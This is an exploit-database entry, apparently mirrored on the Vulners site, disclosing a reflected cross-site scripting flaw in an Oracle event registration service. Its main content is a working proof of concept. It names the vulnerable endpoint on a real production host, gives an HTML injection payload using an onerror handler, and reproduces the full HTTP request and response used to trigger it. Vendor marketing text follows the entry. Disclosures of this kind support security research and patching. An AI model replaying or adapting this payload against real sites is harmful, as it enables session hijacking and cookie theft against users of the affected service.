`# Exploit Title: [ POST BASED XSS at ORACLE ]
# Date: [ 18 Oct 2017 ]
# Exploit Author: [ Ismail Tasdelen ]
# Vendor Homepage: [https://www.oracle.com/]
# Software Link: [ Oracle App Service ]
# Version: [ Oracle App Service - XXX2017OCXXX ]
# Tested on: Chrome / FireFox / Opera / IE / Safari Browser
# Description :
This script is possibly vulnerable to Cross Site Scripting ( XSS ) attacks.
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious
code (usually in the form of Javascript) to another user. Because a browser cannot know if the script
should be trusted or not, it will execute the script in the user context allowing the attacker to access
any cookies or session tokens retained by the browser.
# Url address : eventreg.oracle.com
This vulnerability affects /certainApp/App/services/trigger.cfm
# XSS Payload : POSTsoap=SOAP%20POST<video><source onerror="javascript:prompt(998299)">
# Attack Details :
URL encoded POST input callMethod was set to POSTsoap=SOAP%20POST<video><source onerror="javascript:prompt(998299)">
The input is reflected inside a text element.
# HTTP Request / Response :
[+] Request ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST /certainApp/App/services/trigger.cfm HTTP/1.1
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Referer: https://eventreg.oracle.com:443/
Cookie: applicationName=oracle
Host: eventreg.oracle.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
POSTsoap=SOAP%20POST&callMethod=POSTsoap%3dSOAP%2520POST<video><source%20onerror%3d%22javascript:prompt(998299)%22>
&callService=profile&gogo=true&path=/data02/webapps/certainApp/App/services&PROENCODEDID=94102&SESSIONTOKEN=1&showNavigation=false
[+] Response ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
HTTP/1.1 200 OK
Date: Wed, 18 Oct 2017 19:28:18 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000; includeSubDomains
x-xss-protection: 0
Set-Cookie: applicationName=oracle;Domain=.eventreg.oracle.com;Path=/;Expires=Thu, 19 Oct 2017 19:28:18 GMT;Secure;HttpOnly
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Keep-Alive: timeout=900, max=95
Connection: Keep-Alive
Original-Content-Encoding: gzip
Content-Length: 3011
# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation